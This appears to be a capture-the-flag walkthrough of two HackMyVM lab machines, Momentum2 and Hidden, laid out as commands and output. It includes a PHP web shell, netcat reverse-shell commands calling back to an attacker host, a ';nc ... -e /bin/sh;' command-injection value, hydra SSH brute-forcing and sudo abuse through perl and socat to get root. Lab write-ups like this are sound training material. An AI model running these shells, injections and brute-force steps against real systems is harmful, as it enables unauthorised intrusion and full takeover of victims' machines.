HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                      sudo-0 | 0 [15:05:51]
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. We need to set some parameter to upload php file.

 cat ajax.php.bak  
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
    }
    else{
         $valid_ext = array("txt");
    }
    // Remember success upload returns 1 ⏎    

Generate dic file of cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with shell code in it.

 cat cmd.php                                                                                                                                                                                   fish-0 | 0 [21:02:13]
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.

[image-20210531210127178.png]

Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.

[image-20210531212540903.png]

Then send it to intruder, add §§ sign to admin=§xxxxx§.

[image-20210531213130392.png]

Set payload as cookie.txt we just generated.

image-20210531213158667 [image-20210531213158667.png]

Click start attack. Then we get the right cookie with response code 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check if cmd.php works OK.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234                                                                    fish-0 | 130 [15:44:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, found password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

Asterisk mark (*) means any character, we generate a dic.

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt

Bruteforce ssh with user name athena and this dic.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f fish-0 | 0 [15:25:54]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*

Ssh login as athena, check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py

Run the py file, when asked for input seed, input shell code.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;

Listen to the port just input at another terminal, and get root shell.

nc -nvlp 1234 man-0 | 0 [15:32:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Hidden Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                     sudo-0 | 0 [14:50:06]
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log                                                                         fish-0 | 0 [19:39:15]
 /index.html           (Status: 200) [Size: 392]

Check index.html, found a png file and some hints.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The png is tic-tac-toe Cipher. Decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts. Scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

Fuzz loot.php.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"  

Check RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'                               fish-0 | 0 [18:08:52]
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get reverse shell as www-data.

curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234                                                                      fish-0 | 0 [18:05:18]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get shell as toreto.

www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Upload id_rsa.pub in /home/toreto/.ssh, and rename it to authorized_keys, chmod 600.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
<http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys

Then login ssh as toreto.

ssh toreto@192.168.56.99 fish-0 | 0 [19:42:48]
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

---

 / ======= \
/ __________\

___
	_____		___

\=____/ Hack_MyVM - Hidden
/ """"""""""" \ -------------------
/ ::::::::::::: \
(____)

---

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$

In /home/atenea/.hidden, found a dic file.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt

Bruteforce password of atenea.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f nc-0 | 130 [19:29:55]
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Login as atenea, check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat

Get root shell using socat.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden